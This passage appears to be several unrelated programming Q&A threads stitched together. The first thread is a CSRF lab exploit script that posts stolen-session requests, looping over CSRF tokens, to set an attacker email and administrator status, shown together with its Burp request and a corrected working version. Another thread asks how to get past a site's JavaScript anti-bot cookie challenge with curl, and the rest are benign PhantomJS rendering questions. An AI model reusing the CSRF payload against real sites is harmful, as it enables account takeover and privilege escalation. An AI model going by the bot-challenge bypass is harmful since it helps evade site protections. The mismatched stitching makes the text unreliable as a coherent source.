I'm working on a CSRF lab and trying to iterate through 20+ tokens.
<script>
var token = ["f23e7b8c79d33d39ea67f0062b2cdb23", "90b157ac841c5aa7854285ea225c18e3", "9a189a1ef6a01aae6a298a0594831b66"];
var arrayLength = token.length;
for (var i = 0; i < arrayLength; i++) {
function submitRequest() {
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://csrf.labs/function.php", true);
xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.withCredentials = true;
var body = "username=foo&email=hacker%40evil.net&status=administrator&csrf=" + token[i] + "&submit=";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
submitRequest.call();
};
</script>
I'm using +token[i]+ to insert the token into the csrf param, but viewing the request(s) in Burp, it seems to be "undefined":
POST /function.php HTTP/1.1
Host: csrf.labs
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 89
Origin: null
DNT: 1
Connection: close
Cookie: PHPSESSID=[redacted]
Cache-Control: max-age=0
username=foo&email=hacker%40evil.net&status=administrator&csrf=undefined&submit=
What am I getting wrong here? I'm still new to JavaScript so maybe +token[i]+ isn't the proper way to do this?
You're defining i twice in the same scope, either define it with let or use another variable:
var token = ["f23e7b8c79d33d39ea67f0062b2cdb23", "90b157ac841c5aa7854285ea225c18e3", "9a189a1ef6a01aae6a298a0594831b66"];
var arrayLength = token.length;
for (var i = 0; i < arrayLength; i++) {
function submitRequest() {
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://csrf.labs/function.php", true);
xhr.setRequestHeader("Accept", "application/json, text/javascript, */*; q=0.01");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.withCredentials = true;
var body = "username=foo&email=hacker%40evil.net&status=administrator&csrf=" + token[i] + "&submit=";
var aBody = new Uint8Array(body.length);
for (var j = 0; j < aBody.length; j++)
aBody[j] = body.charCodeAt(j);
xhr.send(new Blob([aBody]));
}
submitRequest.call();
};
When your create the fn submitRequest() a new scope is created that doesn't know about the var token.So i think you need to pass token[i] to your fn while calling and also prototype the fn as per the requirement.
function submitRequest(token){
}
submitRequest(token[i]);
i am trying to get the respawn of this api
https://www.zoomeye.org/api/search?q=facebook
but the problem is when i am trying the get it with curl it shows me this respawn header
HTTP/1.1 521
Server: nginx
Date: Thu, 09 Aug 2018 11:45:39 GMT
Transfer-Encoding: chunked
Connection: keep-alive
X-Via-JSL: 79dfd01,-
with this javescript code in the body
<script>
var x = "length##https#####while###0xEDB88320#eval#reverse#else#Array#setTimeout#hantom##Aug##18##challenge##RegExp#363#if#GMT#Thu#PiXG#firstChild##1#href#g###document#new###8#charCodeAt#5k#join#1533815182#3D#as#return##f##addEventListener#div##pathname#split#fromCharCode#46#captcha#O#function#location#Expires#match#rOm9XFMtA3QKV7nYsPGT4lifyWwkq5vcjH2IdxUoCbhERLaz81DNB6#DOMContentLoaded###attachEvent###0#var#3#4V7#chars#catch###d###0xFF#createElement##String#try####parseInt#for#__p#cookie#e#09##window#charAt#substr#Path#toString#search##12#toLowerCase#innerHTML#2#false#36#22##JgSe0upZ##onreadystatechange######a#__jsl_clearance##replace#1500#B#".replace(/#*$/, "").split("#"),
y = "1t 2n=1h(){g('1i.y=1i.1b+1i.2e.2z(/[\\?|&]1f-n/,\\'\\')',2A);C.25='2x=11.q|1s|'+(1h(){1t 2p=[1h(2n){14 2n},1h(2p){14 2p},1h(2n){14 c('1G.1d('+2n+')')},1h(2n){23(1t 2p=1s;2p<2n.1;2p++){2n[2p]=22(2n[2p]).2d(2l)};14 2n.10('')}],2n=['1g',[(-~-~![]+[]+[])+[-~(+!{})]],'2j%',(-~-~![]+[]+[]),'2B',[(-~-~![]+[]+[])+((-~{}+[(-~-~![])*[-~-~![]]]>>-~{})+[])],[((-~{}+[(-~-~![])*[-~-~![]]]>>-~{})+[])+(~~!!29['24'+'h'+'13']+[])],[(-~-~![]+[]+[])+[(-~[]+[((+!+{})<<(+!+{}))]>>((+!+{})<<(+!+{})))+(-~[]+[((+!+{})<<(+!+{}))]>>((+!+{})<<(+!+{})))]],[-~(+!{})],'u',[[-~-~![]]/~~{}+[[]][1s]][1s].2a(~~{}),[(G+[[]][1s])+[(-~[]+[((+!+{})<<(+!+{}))]>>((+!+{})<<(+!+{})))+(-~[]+[((+!+{})<<(+!+{}))]>>((+!+{})<<(+!+{})))]],[(-~-~![]+[]+[])+(G+[[]][1s])],'I',[(-~[2j]+[]+[[]][1s])+[-~(+!{})]],'1v',[(-~[]+[((+!+{})<<(+!+{}))]>>((+!+{})<<(+!+{})))+(-~[]+[((+!+{})<<(+!+{}))]>>((+!+{})<<(+!+{})))]+[-~[]+(-~-~![]^-~(+!{}))]+(~~!!29['24'+'h'+'13']+[]),[[-~(+!{})]+(-~-~![]+[]+[]),(-~-~![]+[]+[])+(G+[[]][1s])],'z%12'];23(1t 1a=1s;1a<2n.1;1a++){2n[1a]=2p[[x,1u,x,1s,x,1u,2j,1u,1s,x,1s,2j,1u,x,1u,x,1s,1u,x][1a]](2n[1a])};14 2n.10('')})()+';1j=t, 27-j-l 2g:1e:2m s;2c=/;'};r((1h(){1H{14 !!29.18;}1x(26){14 2k;}})()){C.18('1m',2n,2k)}e{C.1p('2q',2n)}",
f = function(x, y) {
var a = 0,
b = 0,
c = 0;
x = x.split("");
y = y || 99;
while ((a = x.shift()) && (b = a.charCodeAt(0) - 77.5)) c = (Math.abs(b) < 13 ? (b + 48.5) : parseInt(a, 36)) + y * c;
return c
},
z = f(y.match(/\w/g).sort(function(x, y) {
return f(x) - f(y)
}).pop());
while (z++) try {
eval(y.replace(/\b\w+\b/g, function(y) {
return x[f(y, z) - 1] || ("_" + y)
}));
break
} catch (_) {}
</script>
so what i notice is this javascript code sets a cookie with name __jsl_clearance so how can i use this api in my application
any ideas or solutions
-- update this is my curl code --
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://www.zoomeye.org/api/search?q=facebook");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "GET");
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cook.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, 'cook.txt');
curl_setopt($ch, CURLOPT_ENCODING, 'gzip, deflate');
$headers = array();
$headers[] = "Accept-Encoding: gzip, deflate, br";
$headers[] = "Accept-Language: ar,en-US;q=0.9,en;q=0.8";
$headers[] = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36";
$headers[] = "Accept: application/json, text/plain, */*";
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
echo $result = curl_exec($ch);
curl_close ($ch);
thanks .....
I am going to run phantomjs in nodejs child process (spawn) to render webpage to picture. but when i set page.setting.javascriptEnabled = true and render page over three times(first time and second time are right), it will throw error. and if set javascriptEnabled = false, it runs well.
this is log in iterm
code:
var webpage = require('webpage');
var write = require('system').stdout.write;
var configMod = require('./config');
var config = configMod.get();
var args = require('system').args;
var phantomId = args[1];
function doJob(job) {
var page = webpage.create();
var jobId = job.id;
var url = job.url;
var viewportSize = job.viewportSize || config.viewportSize;
var clipRect = job.clipRect || config.clipRect;
var zoomFactor = job.zoomFactor || config.zoomFactor;
var imagePath = job.imagePath;
viewportSize && (page.viewportSize = viewportSize);
clipRect && (page.clipRect = clipRect);
zoomFactor && (page.zoomFactor = zoomFactor);
page.settings = {
javascriptEnabled: true,
loadImages: true,
resourceTimeout: 3000,
userAgent: 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.31 (KHTML, like Gecko) PhantomJS/2.1.0'
};
page.open(url, function (status) {
write(url + ':' + status)
var data;
var fetchObj;
if (status === 'fail') {
data = {
JOBID: jobId,
url: url,
phantomId: phantomId,
status: false
};
// release the memory
page.close();
// send data to NodeJS
write('{{begin}}' + JSON.stringify(data) + '{{end}}');
} else if (status === 'success') {
page.render(imagePath, {quality: job.quality});
data = {
JOBID: jobId,
url: url,
phantomId: phantomId,
image: imagePath,
status: true
};
// release the memory
page.close();
// send data to NodeJS
write('{{begin}}' + JSON.stringify(data) + '{{end}}');
}
});
}
I have a webpage I want to print.
for that I am using phantomjs.
In the following example you will notice a strange effect.
non of the rotated text has been rendered correctly
I cant seem to get my head around how this can happen,
chrome is rendering this perfectly and phantomjs-webpage userAgent is set to webkit.
This is the link I'm trying to capture:
http://www.facegift.co.il/canvas/print.aspx?userItemId=27477&Sc=974088&pagenum=3&width=1500&print=2
This is the image that's been rendered:
and This is my code example:
var page = require('webpage').create();
var args = require('system').args;
var isLoad = false;
page.settings.userAgent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36';
page.viewportSize = { width: 500, height: 687.5 };
page.open('http://www.facegift.co.il/canvas/print.aspx?userItemId=27477&Sc=974088&pagenum=3&width=1500&print=2', function (status) {
var ue = page.evaluate(function () {
return window.navigator.appVersion;
});
console.log("status: " + status);
console.log("ue: " + ue);
if (status === "success") {
var timer = setInterval(function () {
var ps = page.evaluate(function () {
document.body.bgColor = 'white';
return document.getElementById("pageStatus").innerHTML;
});
if (!isLoad) {
console.log("wait...");
if (ps == "loaded") {
clearInterval(timer);
console.log("loaded");
isLoad = true;
page.render('new/exam.jpg');
phantom.exit();
}
}
}, 10);
}
});
Your help is highly appreciated.
Thank you.
I'm using phantomjs to capture screen of my webpage. I have SVG elements on my page and sometimes it doesn't render those correctly.
var page = require('webpage').create();
var args = require('system').args;
var isLoad = false;
page.settings.userAgent = "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90";
var w = parseFloat(args[4]);
var h = parseFloat(args[5]);
page.viewportSize = { width: w, height: h };
page.open('http://www.facegift.co.il/canvas/?userItemId=' + args[1] + '&Sc=' + args[2] + '&print=' + args[6] + '&width=' + args[4] + '&pageNum=' + args[3] + '&ver=' + args[7], function(status) {
var ue = page.evaluate(function(){
return navigator.userAgent;
});
console.log("status: " + status);
if(status === "success") {
setInterval(function(){
var ps = page.evaluate(function() {
document.body.bgColor = 'white';
return document.getElementById("pageStatus").innerHTML;
});
if(!isLoad){
console.log("wait...");
if(ps == "loaded"){
console.log("loaded");
isLoad = true;
page.render('example1.jpg');
console.log("rendered");
phantom.exit();
}
}
}, 100);
}
});
here are examples of two results with the same request:
here is the link to the actual page I want to render:
http://www.facegift.co.il/canvas/?userItemId=17887&sc=987404&print=1&width=4000&pageNum=7
to call phantom I use:
phantomjs facegift.js 17887 987404 7 4000 2048.77 1 2335
ok, fixed. the problem was in my code.
thanks to #Paul LeBeau who answered my next related question.
SVG disappear when zoom in on chrome
phantomjs and chrome are great. sorry I thought something went wrong on their behalf.